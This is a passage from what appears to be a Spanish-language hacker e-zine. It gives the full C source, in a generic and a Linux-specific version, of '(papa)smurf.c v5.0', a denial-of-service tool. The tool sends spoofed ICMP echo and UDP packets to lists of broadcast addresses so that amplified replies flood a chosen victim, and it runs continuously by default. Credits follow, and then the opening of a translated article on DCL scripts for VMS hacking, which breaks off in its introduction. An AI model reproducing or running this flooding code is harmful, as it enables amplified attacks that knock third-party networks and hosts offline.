  4497.  *  Old linux kernels won't have BSD header support, so this may not compile.
  4498.  */
  4499.  
  4500. /* End of Hideously Long Header */
  4501.                             
  4502. #include <stdio.h>
  4503. #include <netdb.h>
  4504. #include <sys/types.h>
  4505. #include <sys/socket.h>
  4506. #include <netinet/in.h>
  4507. #include <netinet/in_systm.h>
  4508. #include <arpa/inet.h>
  4509. #include <sys/stat.h>
  4510. #include <fcntl.h>
  4511. #include <unistd.h>
  4512. #include <stdlib.h>
  4513. #include <string.h>
  4514. #include <ctype.h>
  4515. #include <time.h>
  4516. #ifdef LINUX 
  4517. #define __FAVOR_BSD                            /* should be __FAVOUR_BSD ;) */
  4518. #ifndef _USE_BSD
  4519. #define _USE_BSD
  4520. #endif
  4521. #endif
  4522. #include <netinet/ip.h>
  4523. #include <netinet/ip_icmp.h>
  4524. #include <netinet/udp.h>
  4525.  
  4526. #ifdef LINUX
  4527. #define FIX(n)     htons(n)
  4528. #else
  4529. #define FIX(n)     (n)
  4530. #endif
  4531.  
  4532. struct smurf_t
  4533. {
  4534.     struct sockaddr_in sin;                    /* socket prot structure */
  4535.     int s;                                     /* socket */
  4536.     int udp, icmp;                             /* icmp, udp booleans */
  4537.     int rnd;                                   /* Random dst port boolean */
  4538.     int psize;                                 /* packet size */
  4539.     int num;                                   /* number of packets to send */
  4540.     int delay;                                 /* delay between (in ms) */
  4541.     u_short dstport[25+1];                     /* dest port array (udp) */
  4542.     u_short srcport;                           /* source port (udp) */
  4543.     char *padding;                             /* junk data */
  4544. };
  4545.  
  4546. /* function prototypes */
  4547. void usage (char *);
  4548. u_long resolve (char *);
  4549. void getports (struct smurf_t *, char *);
  4550. void smurficmp (struct smurf_t *, u_long);
  4551. void smurfudp (struct smurf_t *, u_long, int);
  4552. u_short in_chksum (u_short *, int);
  4553.  
  4554. int 
  4555. main (int argc, char *argv[])
  4556. {
  4557.     struct smurf_t sm;
  4558.     struct stat st;
  4559.     u_long bcast[1024];
  4560.     char buf[32];
  4561.     int c, fd, n, cycle, num = 0, on = 1; 
  4562.     FILE *bcastfile;
  4563.  
  4564.     /* shameless self promotion banner */
  4565.     fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");
  4566.  
  4567.     if (argc < 3) 
  4568.         usage(argv[0]);
  4569.  
  4570.     /* set defaults */
  4571.     memset((struct smurf_t *) &sm, 0, sizeof(sm));
  4572.     sm.icmp = 1;
  4573.     sm.psize = 64;
  4574.     sm.num = 0;
  4575.     sm.delay = 10000;
  4576.     sm.sin.sin_port = htons(0);
  4577.     sm.sin.sin_family = AF_INET;
  4578.     sm.srcport = 0;
  4579.     sm.dstport[0] = 7;
  4580.  
  4581.     /* resolve 'source' host, quit on error */
  4582.     sm.sin.sin_addr.s_addr = resolve(argv[1]);
  4583.  
  4584.     /* open the broadcast file */
  4585.     if ((bcastfile = fopen(argv[2], "r")) == NULL)
  4586.     {
  4587.         perror("Opening broadcast file");
  4588.         exit(-1);
  4589.     }
  4590.  
  4591.     /* parse out options */
  4592.     optind = 3;
  4593.     while ((c = getopt(argc, argv, "rRn:d:p:P:s:S:f:")) != -1)
  4594.     {
  4595.     switch (c)
  4596.     {
  4597.         /* random dest ports */
  4598.         case 'r':
  4599.         sm.rnd = 1;
  4600.         break;
  4601.  
  4602.         /* random src/dest ports */
  4603.         case 'R':
  4604.         sm.rnd = 1;
  4605.                 sm.srcport = 0;
  4606.         break;
  4607.  
  4608.         /* number of packets to send */
  4609.         case 'n':
  4610.         sm.num = atoi(optarg);
  4611.         break;
  4612.  
  4613.         /* usleep between packets (in ms) */
  4614.         case 'd':
  4615.         sm.delay = atoi(optarg);
  4616.         break;
  4617.  
  4618.         /* multiple ports */
  4619.         case 'p':
  4620.         if (strchr(optarg, ',')) 
  4621.             getports(&sm, optarg);
  4622.         else
  4623.             sm.dstport[0] = (u_short) atoi(optarg);
  4624.         break;
  4625.  
  4626.         /* specify protocol */
  4627.         case 'P':
  4628.         if (strcmp(optarg, "icmp") == 0)
  4629.         {
  4630.             /* this is redundant */
  4631.             sm.icmp = 1;
  4632.             break;
  4633.         }
  4634.         if (strcmp(optarg, "udp") == 0)
  4635.         {
  4636.             sm.icmp = 0;
  4637.             sm.udp = 1;
  4638.             break;
  4639.         }
  4640.         if (strcmp(optarg, "both") == 0)
  4641.         {
  4642.             sm.icmp = 1;
  4643.             sm.udp = 1;
  4644.             break;
  4645.         }
  4646.  
  4647.         puts("Error: Protocol must be icmp, udp or both");
  4648.         exit(-1);
  4649.  
  4650.         /* source port */
  4651.         case 's':
  4652.         sm.srcport = (u_short) atoi(optarg);
  4653.         break;
  4654.  
  4655.         /* specify packet size */
  4656.         case 'S':
  4657.         sm.psize = atoi(optarg);
  4658.         break;
  4659.  
  4660.         /* filename to read padding in from */
  4661.         case 'f':
  4662.         /* open and stat */
  4663.         if ((fd = open(optarg, O_RDONLY)) == -1)
  4664.         {
  4665.             perror("Opening packet data file");
  4666.             exit(-1);
  4667.         }
  4668.         if (fstat(fd, &st) == -1)
  4669.         {
  4670.             perror("fstat()");
  4671.             exit(-1);
  4672.         }
  4673.  
  4674.         /* malloc and read */
  4675.         sm.padding = (char *) malloc(st.st_size);
  4676.         if (read(fd, sm.padding, st.st_size) < st.st_size)
  4677.         {
  4678.             perror("read()");
  4679.             exit(-1);
  4680.         }
  4681.  
  4682.         sm.psize = st.st_size;
  4683.         close(fd);
  4684.         break;
  4685.  
  4686.             default:
  4687.                 usage(argv[0]);
  4688.         }
  4689.     } /* end getopt() loop */
  4690.         
  4691.     /* create packet padding if neccessary */
  4692.     if (!sm.padding)
  4693.     {
  4694.     sm.padding = (char *) malloc(sm.psize);
  4695.     memset(sm.padding, 0, sm.psize);
  4696.     }
  4697.  
  4698.     /* create the raw socket */
  4699.     if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
  4700.     {
  4701.     perror("Creating raw socket (are you root?)");
  4702.     exit(-1);
  4703.     }
  4704.  
  4705.     /* Include IP headers ourself (thanks anyway though) */
  4706.   if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
  4707.     {
  4708.     perror("setsockopt()");
  4709.     exit(-1);
  4710.     }
  4711.  
  4712.     /* read in our broadcasts and store them in our array */
  4713.     while (fgets(buf, sizeof buf, bcastfile) != NULL)
  4714.     {
  4715.     char *p;
  4716.     int valid;
  4717.  
  4718.         /* skip over comments/blank lines */
  4719.         if (buf[0] == '#' || buf[0] == '\n') continue;
  4720.  
  4721.         /* get rid of newline */ 
  4722.         buf[strlen(buf) - 1] = '\0';
  4723.  
  4724.         /* check for valid address */
  4725.         for (p = buf, valid = 1; *p != '\0'; p++)
  4726.         {
  4727.             if ( ! isdigit(*p) && *p != '.' ) 
  4728.             {
  4729.                 fprintf(stderr, "Skipping invalid ip %s\n", buf);
  4730.                 valid = 0;
  4731.                 break;
  4732.             }
  4733.         }
  4734.  
  4735.         /* if valid address, copy to our array */
  4736.         if (valid)
  4737.         {
  4738.         bcast[num] = inet_addr(buf);
  4739.             num++;
  4740.         if (num == 1024)
  4741.         break;
  4742.         }
  4743.     } /* end bcast while loop */
  4744.  
  4745.     /* seed our random function */
  4746.     srand(time(NULL) * getpid());
  4747.  
  4748.     /* wee.. */
  4749.     for (n = 0, cycle = 0; n < sm.num || !sm.num; n++)
  4750.     {
  4751.     if (sm.icmp)
  4752.         smurficmp(&sm, bcast[cycle]);
  4753.  
  4754.     if (sm.udp)
  4755.     {
  4756.         int x;
  4757.         for (x = 0; sm.dstport[x] != 0; x++)
  4758.             smurfudp(&sm, bcast[cycle], x);
  4759.     }
  4760.  
  4761.     /* quick nap */
  4762.     usleep(sm.delay);
  4763.  
  4764.     /* cosmetic psychadelic dots */
  4765.     if (n % 50 == 0)
  4766.     {
  4767.         printf(".");
  4768.         fflush(stdout);
  4769.     }
  4770.  
  4771.     cycle = (cycle + 1) % num;
  4772.     }
  4773.  
  4774.     exit(0);
  4775. }
  4776.  
  4777. void 
  4778. usage (char *s)
  4779. {
  4780.     fprintf(stderr,
  4781.             "usage: %s <source host> <broadcast file> [options]\n"
  4782.         "\n"
  4783.         "Options\n"
  4784.         "-p:    Comma separated list of dest ports (default 7)\n"
  4785.         "-r:    Use random dest ports\n"
  4786.         "-R:    Use random src/dest ports\n"
  4787.         "-s:    Source port (0 for random (default))\n"
  4788.         "-P:    Protocols to use.  Either icmp, udp or both\n"
  4789.         "-S:    Packet size in bytes (default 64)\n"
  4790.         "-f:    Filename containg packet data (not needed)\n"
  4791.         "-n:    Num of packets to send (0 is continuous (default))\n"
  4792.         "-d:    Delay inbetween packets (in ms) (default 10000)\n"
  4793.         "\n", s);
  4794.     exit(-1);
  4795. }
  4796.  
  4797. u_long 
  4798. resolve (char *host)
  4799. {
  4800.     struct in_addr in;
  4801.     struct hostent *he;
  4802.  
  4803.     /* try ip first */
  4804.     if ((in.s_addr = inet_addr(host)) == -1)
  4805.     {
  4806.     /* nope, try it as a fqdn */
  4807.     if ((he = gethostbyname(host)) == NULL)
  4808.     {
  4809.         /* can't resolve, bye. */
  4810.             herror("Resolving victim host");
  4811.         exit(-1);
  4812.     }
  4813.  
  4814.     memcpy( (caddr_t) &in, he->h_addr, he->h_length);
  4815.     }
  4816.  
  4817.     return(in.s_addr);
  4818. }
  4819.  
  4820. void 
  4821. getports (struct smurf_t *sm, char *p)
  4822. {
  4823.     char tmpbuf[16];
  4824.     int n, i;
  4825.  
  4826.     for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++)
  4827.     {
  4828.     if (*p == ',')
  4829.     {
  4830.             tmpbuf[i] = '\0';
  4831.         sm->dstport[n] = (u_short) atoi(tmpbuf);
  4832.         n++; i = -1;
  4833.         continue;
  4834.     }
  4835.  
  4836.     tmpbuf[i] = *p;
  4837.     }
  4838.     tmpbuf[i] = '\0';
  4839.     sm->dstport[n] = (u_short) atoi(tmpbuf);
  4840.     sm->dstport[n + 1] = 0;
  4841. }
  4842.  
  4843. void
  4844. smurficmp (struct smurf_t *sm, u_long dst)
  4845. {
  4846.     struct ip *ip;
  4847.     struct icmp *icmp;
  4848.     char *packet;
  4849.  
  4850.     int pktsize = sizeof(struct ip) + sizeof(struct icmp) + sm->psize;
  4851.  
  4852.     packet = malloc(pktsize);
  4853.     ip = (struct ip *) packet;
  4854.     icmp = (struct icmp *) (packet + sizeof(struct ip));
  4855.  
  4856.     memset(packet, 0, pktsize);
  4857.  
  4858.     /* fill in IP header */
  4859.     ip->ip_v = 4;
  4860.     ip->ip_hl = 5;
  4861.     ip->ip_tos = 0;
  4862.     ip->ip_len = FIX(pktsize);
  4863.     ip->ip_ttl = 255;
  4864.     ip->ip_off = 0;
  4865.     ip->ip_id = FIX( getpid() );
  4866.     ip->ip_p = IPPROTO_ICMP;
  4867.     ip->ip_sum = 0;
  4868.     ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
  4869.     ip->ip_dst.s_addr = dst;
  4870.  
  4871.     /* fill in ICMP header */
  4872.     icmp->icmp_type = ICMP_ECHO;
  4873.     icmp->icmp_code = 0;
  4874.     icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));    /* thx griffin */
  4875.  
  4876.     /* send it on its way */
  4877.     if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
  4878.         sizeof(struct sockaddr)) == -1)
  4879.     {
  4880.     perror("sendto()");
  4881.     exit(-1);
  4882.     }
  4883.  
  4884.     free(packet);                    /* free willy! */
  4885. }
  4886.  
  4887. void
  4888. smurfudp (struct smurf_t *sm, u_long dst, int n)
  4889. {
  4890.     struct ip *ip;
  4891.     struct udphdr *udp;
  4892.     char *packet, *data;
  4893.  
  4894.     int pktsize = sizeof(struct ip) + sizeof(struct udphdr) + sm->psize;
  4895.  
  4896.     packet = (char *) malloc(pktsize);
  4897.     ip = (struct ip *) packet;
  4898.     udp = (struct udphdr *) (packet + sizeof(struct ip));
  4899.     data = (char *) (packet + sizeof(struct ip) + sizeof(struct udphdr));
  4900.  
  4901.     memset(packet, 0, pktsize);
  4902.     if (*sm->padding)
  4903.         memcpy((char *)data, sm->padding, sm->psize);
  4904.  
  4905.     /* fill in IP header */
  4906.     ip->ip_v = 4;
  4907.     ip->ip_hl = 5;
  4908.     ip->ip_tos = 0;
  4909.     ip->ip_len = FIX(pktsize);
  4910.     ip->ip_ttl = 255;
  4911.     ip->ip_off = 0;
  4912.     ip->ip_id = FIX( getpid() );
  4913.     ip->ip_p = IPPROTO_UDP;
  4914.     ip->ip_sum = 0;
  4915.     ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
  4916.     ip->ip_dst.s_addr = dst;
  4917.  
  4918.     /* fill in UDP header */
  4919.     if (sm->srcport) udp->uh_sport = htons(sm->srcport);
  4920.     else udp->uh_sport = htons(rand());
  4921.     if (sm->rnd) udp->uh_dport = htons(rand());
  4922.     else udp->uh_dport = htons(sm->dstport[n]);
  4923.     udp->uh_ulen = htons(sizeof(struct udphdr) + sm->psize);
  4924. //    udp->uh_sum = in_chksum((u_short *)udp, sizeof(udp));
  4925.  
  4926.     /* send it on its way */
  4927.     if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
  4928.         sizeof(struct sockaddr)) == -1)
  4929.     {
  4930.     perror("sendto()");
  4931.     exit(-1);
  4932.     }
  4933.  
  4934.     free(packet);                /* free willy! */
  4935. }
  4936.  
  4937. u_short
  4938. in_chksum (u_short *addr, int len)
  4939. {
  4940.     register int nleft = len;
  4941.     register u_short *w = addr;
  4942.     register int sum = 0;
  4943.     u_short answer = 0;
  4944.  
  4945.     while (nleft > 1) 
  4946.     {
  4947.         sum += *w++;
  4948.         nleft -= 2;
  4949.     }
  4950.  
  4951.     if (nleft == 1) 
  4952.     {
  4953.         *(u_char *)(&answer) = *(u_char *)w;
  4954.         sum += answer;
  4955.     }
  4956.  
  4957.     sum = (sum >> 16) + (sum + 0xffff);
  4958.     sum += (sum >> 16);
  4959.     answer = ~sum;
  4960.     return(answer);
  4961. }
  4962.  
  4963. ------------ FIN -------------------------------------------------------------
  4964.  
  4965.   --- papasmurf-linux.c v5.0 ---
  4966.  
  4967. ------------ Codigo Fuente ---------------------------------------------------
  4968.  
  4969. /*
  4970.  *  (papa)smurf.c v5.0 by TFreak (Linux header version)
  4971.  *
  4972.  *  To compile: "gcc -o smurf5 papasmurf-linux.c" 
  4973.  *  
  4974.  *  NOTE: This version is Linux specific.
  4975.  *
  4976.  */
  4977.                             
  4978. #include <stdio.h>
  4979. #include <netdb.h>
  4980. #include <sys/types.h>
  4981. #include <sys/socket.h>
  4982. #include <netinet/in.h>
  4983. #include <netinet/in_systm.h>
  4984. #include <arpa/inet.h>
  4985. #include <sys/stat.h>
  4986. #include <fcntl.h>
  4987. #include <unistd.h>
  4988. #include <stdlib.h>
  4989. #include <string.h>
  4990. #include <ctype.h>
  4991. #include <time.h>
  4992. #ifdef __USE_BSD
  4993. #undef __USE_BSD
  4994. #endif
  4995. #include <netinet/ip.h>
  4996. #include <netinet/ip_icmp.h>
  4997. #include <netinet/udp.h>
  4998.  
  4999. struct smurf_t
  5000. {
  5001.     struct sockaddr_in sin;                    /* socket prot structure */
  5002.     int s;                                     /* socket */
  5003.     int udp, icmp;                             /* icmp, udp booleans */
  5004.     int rnd;                                   /* Random dst port boolean */
  5005.     int psize;                                 /* packet size */
  5006.     int num;                                   /* number of packets to send */
  5007.     int delay;                                 /* delay between (in ms) */
  5008.     u_short dstport[25+1];                     /* dest port array (udp) */
  5009.     u_short srcport;                           /* source port (udp) */
  5010.     char *padding;                             /* junk data */
  5011. };
  5012.  
  5013. /* function prototypes */
  5014. void usage (char *);
  5015. u_long resolve (char *);
  5016. void getports (struct smurf_t *, char *);
  5017. void smurficmp (struct smurf_t *, u_long);
  5018. void smurfudp (struct smurf_t *, u_long, int);
  5019. u_short in_chksum (u_short *, int);
  5020.  
  5021. int 
  5022. main (int argc, char *argv[])
  5023. {
  5024.     struct smurf_t sm;
  5025.     struct stat st;
  5026.     u_long bcast[1024];
  5027.     char buf[32];
  5028.     int c, fd, n, cycle, num = 0, on = 1; 
  5029.     FILE *bcastfile;
  5030.  
  5031.     /* shameless self promotion banner */
  5032.     fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");
  5033.  
  5034.     if (argc < 3) 
  5035.         usage(argv[0]);
  5036.  
  5037.     /* set defaults */
  5038.     memset((struct smurf_t *) &sm, 0, sizeof(sm));
  5039.     sm.icmp = 1;
  5040.     sm.psize = 64;
  5041.     sm.num = 0;
  5042.     sm.delay = 10000;
  5043.     sm.sin.sin_port = htons(0);
  5044.     sm.sin.sin_family = AF_INET;
  5045.     sm.srcport = 0;
  5046.     sm.dstport[0] = 7;
  5047.  
  5048.     /* resolve 'source' host, quit on error */
  5049.     sm.sin.sin_addr.s_addr = resolve(argv[1]);
  5050.  
  5051.     /* open the broadcast file */
  5052.     if ((bcastfile = fopen(argv[2], "r")) == NULL)
  5053.     {
  5054.         perror("Opening broadcast file");
  5055.         exit(-1);
  5056.     }
  5057.  
  5058.     /* parse out options */
  5059.     optind = 3;
  5060.     while ((c = getopt(argc, argv, "rRn:d:p:P:s:S:f:")) != -1)
  5061.     {
  5062.     switch (c)
  5063.     {
  5064.         /* random dest ports */
  5065.         case 'r':
  5066.         sm.rnd = 1;
  5067.         break;
  5068.  
  5069.         /* random src/dest ports */
  5070.         case 'R':
  5071.         sm.rnd = 1;
  5072.                 sm.srcport = 0;
  5073.         break;
  5074.  
  5075.         /* number of packets to send */
  5076.         case 'n':
  5077.         sm.num = atoi(optarg);
  5078.         break;
  5079.  
  5080.         /* usleep between packets (in ms) */
  5081.         case 'd':
  5082.         sm.delay = atoi(optarg);
  5083.         break;
  5084.  
  5085.         /* multiple ports */
  5086.         case 'p':
  5087.         if (strchr(optarg, ',')) 
  5088.             getports(&sm, optarg);
  5089.         else
  5090.             sm.dstport[0] = (u_short) atoi(optarg);
  5091.         break;
  5092.  
  5093.         /* specify protocol */
  5094.         case 'P':
  5095.         if (strcmp(optarg, "icmp") == 0)
  5096.         {
  5097.             /* this is redundant */
  5098.             sm.icmp = 1;
  5099.             break;
  5100.         }
  5101.         if (strcmp(optarg, "udp") == 0)
  5102.         {
  5103.             sm.icmp = 0;
  5104.             sm.udp = 1;
  5105.             break;
  5106.         }
  5107.         if (strcmp(optarg, "both") == 0)
  5108.         {
  5109.             sm.icmp = 1;
  5110.             sm.udp = 1;
  5111.             break;
  5112.         }
  5113.  
  5114.         puts("Error: Protocol must be icmp, udp or both");
  5115.         exit(-1);
  5116.  
  5117.         /* source port */
  5118.         case 's':
  5119.         sm.srcport = (u_short) atoi(optarg);
  5120.         break;
  5121.  
  5122.         /* specify packet size */
  5123.         case 'S':
  5124.         sm.psize = atoi(optarg);
  5125.         break;
  5126.  
  5127.         /* filename to read padding in from */
  5128.         case 'f':
  5129.         /* open and stat */
  5130.         if ((fd = open(optarg, O_RDONLY)) == -1)
  5131.         {
  5132.             perror("Opening packet data file");
  5133.             exit(-1);
  5134.         }
  5135.         if (fstat(fd, &st) == -1)
  5136.         {
  5137.             perror("fstat()");
  5138.             exit(-1);
  5139.         }
  5140.  
  5141.         /* malloc and read */
  5142.         sm.padding = (char *) malloc(st.st_size);
  5143.         if (read(fd, sm.padding, st.st_size) < st.st_size)
  5144.         {
  5145.             perror("read()");
  5146.             exit(-1);
  5147.         }
  5148.  
  5149.         sm.psize = st.st_size;
  5150.         close(fd);
  5151.         break;
  5152.  
  5153.             default:
  5154.                 usage(argv[0]);
  5155.         }
  5156.     } /* end getopt() loop */
  5157.         
  5158.     /* create packet padding if neccessary */
  5159.     if (!sm.padding)
  5160.     {
  5161.     sm.padding = (char *) malloc(sm.psize);
  5162.     memset(sm.padding, 0, sm.psize);
  5163.     }
  5164.  
  5165.     /* create the raw socket */
  5166.     if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
  5167.     {
  5168.     perror("Creating raw socket (are you root?)");
  5169.     exit(-1);
  5170.     }
  5171.  
  5172.     /* Include IP headers ourself (thanks anyway though) */
  5173.   if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
  5174.     {
  5175.     perror("setsockopt()");
  5176.     exit(-1);
  5177.     }
  5178.  
  5179.     /* read in our broadcasts and store them in our array */
  5180.     while (fgets(buf, sizeof buf, bcastfile) != NULL)
  5181.     {
  5182.     char *p;
  5183.     int valid;
  5184.  
  5185.         /* skip over comments/blank lines */
  5186.         if (buf[0] == '#' || buf[0] == '\n') continue;
  5187.  
  5188.         /* get rid of newline */ 
  5189.         buf[strlen(buf) - 1] = '\0';
  5190.  
  5191.         /* check for valid address */
  5192.         for (p = buf, valid = 1; *p != '\0'; p++)
  5193.         {
  5194.             if ( ! isdigit(*p) && *p != '.' ) 
  5195.             {
  5196.                 fprintf(stderr, "Skipping invalid ip %s\n", buf);
  5197.                 valid = 0;
  5198.                 break;
  5199.             }
  5200.         }
  5201.  
  5202.         /* if valid address, copy to our array */
  5203.         if (valid)
  5204.         {
  5205.         bcast[num] = inet_addr(buf);
  5206.             num++;
  5207.         if (num == 1024)
  5208.         break;
  5209.         }
  5210.     } /* end bcast while loop */
  5211.  
  5212.     /* seed our random function */
  5213.     srand(time(NULL) * getpid());
  5214.  
  5215.     /* wee.. */
  5216.     for (n = 0, cycle = 0; n < sm.num || !sm.num; n++)
  5217.     {
  5218.     if (sm.icmp)
  5219.         smurficmp(&sm, bcast[cycle]);
  5220.  
  5221.     if (sm.udp)
  5222.     {
  5223.         int x;
  5224.         for (x = 0; sm.dstport[x] != 0; x++)
  5225.             smurfudp(&sm, bcast[cycle], x);
  5226.     }
  5227.  
  5228.     /* quick nap */
  5229.     usleep(sm.delay);
  5230.  
  5231.     /* cosmetic psychadelic dots */
  5232.     if (n % 50 == 0)
  5233.     {
  5234.         printf(".");
  5235.         fflush(stdout);
  5236.     }
  5237.  
  5238.     cycle = (cycle + 1) % num;
  5239.     }
  5240.  
  5241.     exit(0);
  5242. }
  5243.  
  5244. void 
  5245. usage (char *s)
  5246. {
  5247.     fprintf(stderr,
  5248.             "usage: %s <source host> <broadcast file> [options]\n"
  5249.         "\n"
  5250.         "Options\n"
  5251.         "-p:    Comma separated list of dest ports (default 7)\n"
  5252.         "-r:    Use random dest ports\n"
  5253.         "-R:    Use random src/dest ports\n"
  5254.         "-s:    Source port (0 for random (default))\n"
  5255.         "-P:    Protocols to use.  Either icmp, udp or both\n"
  5256.         "-S:    Packet size in bytes (default 64)\n"
  5257.         "-f:    Filename containg packet data (not needed)\n"
  5258.         "-n:    Num of packets to send (0 is continuous (default))\n"
  5259.         "-d:    Delay inbetween packets (in ms) (default 10000)\n"
  5260.         "\n", s);
  5261.     exit(-1);
  5262. }
  5263.  
  5264. u_long 
  5265. resolve (char *host)
  5266. {
  5267.     struct in_addr in;
  5268.     struct hostent *he;
  5269.  
  5270.     /* try ip first */
  5271.     if ((in.s_addr = inet_addr(host)) == -1)
  5272.     {
  5273.     /* nope, try it as a fqdn */
  5274.     if ((he = gethostbyname(host)) == NULL)
  5275.     {
  5276.         /* can't resolve, bye. */
  5277.             herror("Resolving victim host");
  5278.         exit(-1);
  5279.     }
  5280.  
  5281.     memcpy( (caddr_t) &in, he->h_addr, he->h_length);
  5282.     }
  5283.  
  5284.     return(in.s_addr);
  5285. }
  5286.  
  5287. void 
  5288. getports (struct smurf_t *sm, char *p)
  5289. {
  5290.     char tmpbuf[16];
  5291.     int n, i;
  5292.  
  5293.     for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++)
  5294.     {
  5295.     if (*p == ',')
  5296.     {
  5297.             tmpbuf[i] = '\0';
  5298.         sm->dstport[n] = (u_short) atoi(tmpbuf);
  5299.         n++; i = -1;
  5300.         continue;
  5301.     }
  5302.  
  5303.     tmpbuf[i] = *p;
  5304.     }
  5305.     tmpbuf[i] = '\0';
  5306.     sm->dstport[n] = (u_short) atoi(tmpbuf);
  5307.     sm->dstport[n + 1] = 0;
  5308. }
  5309.  
  5310. void
  5311. smurficmp (struct smurf_t *sm, u_long dst)
  5312. {
  5313.     struct iphdr *ip;
  5314.     struct icmphdr *icmp;
  5315.     char *packet;
  5316.  
  5317.     int pktsize = sizeof(struct iphdr) + sizeof(struct icmphdr) + sm->psize;
  5318.  
  5319.     packet = malloc(pktsize);
  5320.     ip = (struct iphdr *) packet;
  5321.     icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
  5322.  
  5323.     memset(packet, 0, pktsize);
  5324.  
  5325.     /* fill in IP header */
  5326.     ip->version = 4;
  5327.     ip->ihl = 5;
  5328.     ip->tos = 0;
  5329.     ip->tot_len = htons(pktsize);
  5330.     ip->id = htons(getpid());
  5331.     ip->frag_off = 0;
  5332.     ip->ttl = 255;
  5333.     ip->protocol = IPPROTO_ICMP;
  5334.     ip->check = 0;
  5335.     ip->saddr = sm->sin.sin_addr.s_addr;
  5336.     ip->daddr = dst;
  5337.  
  5338.     /* fill in ICMP header */
  5339.     icmp->type = ICMP_ECHO;
  5340.     icmp->code = 0;
  5341.     icmp->checksum = htons(~(ICMP_ECHO << 8));    /* thx griffin */
  5342.  
  5343.     /* send it on its way */
  5344.     if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
  5345.         sizeof(struct sockaddr)) == -1)
  5346.     {
  5347.     perror("sendto()");
  5348.     exit(-1);
  5349.     }
  5350.  
  5351.     free(packet);                    /* free willy! */
  5352. }
  5353.  
  5354. void
  5355. smurfudp (struct smurf_t *sm, u_long dst, int n)
  5356. {
  5357.     struct iphdr *ip;
  5358.     struct udphdr *udp;
  5359.     char *packet, *data;
  5360.  
  5361.     int pktsize = sizeof(struct iphdr) + sizeof(struct udphdr) + sm->psize;
  5362.  
  5363.     packet = (char *) malloc(pktsize);
  5364.     ip = (struct iphdr *) packet;
  5365.     udp = (struct udphdr *) (packet + sizeof(struct iphdr));
  5366.     data = (char *) (packet + sizeof(struct iphdr) + sizeof(struct udphdr));
  5367.  
  5368.     memset(packet, 0, pktsize);
  5369.     if (*sm->padding)
  5370.         memcpy((char *)data, sm->padding, sm->psize);
  5371.  
  5372.     /* fill in IP header */
  5373.     ip->version = 4;
  5374.     ip->ihl = 5;
  5375.     ip->tos = 0;
  5376.     ip->tot_len = htons(pktsize);
  5377.     ip->id = htons(getpid());
  5378.     ip->frag_off = 0;
  5379.     ip->ttl = 255;
  5380.     ip->protocol = IPPROTO_UDP;
  5381.     ip->check = 0;
  5382.     ip->saddr = sm->sin.sin_addr.s_addr;
  5383.     ip->daddr = dst;
  5384.  
  5385.     /* fill in UDP header */
  5386.     if (sm->srcport) udp->source = htons(sm->srcport);
  5387.     else udp->source = htons(rand());
  5388.     if (sm->rnd) udp->dest = htons(rand());
  5389.     else udp->dest = htons(sm->dstport[n]);
  5390.     udp->len = htons(sizeof(struct udphdr) + sm->psize);
  5391. //    udp->check = in_chksum((u_short *)udp, sizeof(udp));
  5392.  
  5393.     /* send it on its way */
  5394.     if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
  5395.         sizeof(struct sockaddr)) == -1)
  5396.     {
  5397.     perror("sendto()");
  5398.     exit(-1);
  5399.     }
  5400.  
  5401.     free(packet);                /* free willy! */
  5402. }
  5403.  
  5404. u_short
  5405. in_chksum (u_short *addr, int len)
  5406. {
  5407.     register int nleft = len;
  5408.     register u_short *w = addr;
  5409.     register int sum = 0;
  5410.     u_short answer = 0;
  5411.  
  5412.     while (nleft > 1) 
  5413.     {
  5414.         sum += *w++;
  5415.         nleft -= 2;
  5416.     }
  5417.  
  5418.     if (nleft == 1) 
  5419.     {
  5420.         *(u_char *)(&answer) = *(u_char *)w;
  5421.         sum += answer;
  5422.     }
  5423.  
  5424.     sum = (sum >> 16) + (sum + 0xffff);
  5425.     sum += (sum >> 16);
  5426.     answer = ~sum;
  5427.     return(answer);
  5428. }
  5429.  
  5430. ------------ FIN -------------------------------------------------------------
  5431.  
  5432.   5.- Creditos
  5433.   ------------
  5434.  
  5435.         Bueno, pues por ahora se acabo lo que se daba, espero que os haya sido
  5436.   util, nada mas. Saludos a TFreak por el codigo fuente, al grupo y a todos
  5437.   los que me han ayudado a hacer este articulo y buscar informacion sobre el,
  5438.   a todos, gracias.
  5439.  
  5440.         para mas informacion, criticas, lo que sea: mac@jjf.org
  5441.  
  5442. <────────────────────────────────────────────────────────────────────────────>
  5443. ██████████████████████████████████████████████████████████████████████████████
  5444. <────────────────────────────────────────────────────────────────────────────>
  5445.                           
  5446.                    Utilidades DCL para el hacker de VMS
  5447.                    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  5448.                                    por
  5449.                                 The Mentor
  5450.                     (Traducido y modificado por EiVoL)
  5451.  
  5452.                      Trucos especiales por Spy Silver
  5453.  
  5454.         Los comandos DCL son un lenguaje extremadamente poderoso, aqui tengo
  5455.   una seleccion de las utilidades que no solo pueden ayudar a los hackers,
  5456.   tambien son un buen ejemplo de programacion en DCL.
  5457.  
  5458.             Vistazo preliminar de DCL
  5459.  
  5460.         Hay muchos documentos de DCL (Los Documentos de ayuda de VMS estan en
  5461.   los mejores sitios para encontrar informacion) para poder usar este codigo 
  5462.   fuente en un VMS copia la secion de texto en tu editor de texto favorito
  5463.   baja la fila al Vax y renombra la fila como .com, haora es una fila DCL las
  5464.   filas DCL se ejecutan con la @ ($@FILA) tambien puedes correrlo en un
  5465.   proceso separado (algo asi como el & en linux) la sintaxis es $SPAWN/NOWAIT
  5466.   @FILA, Nota del traductor: SPAWN es un comando que permite crear un
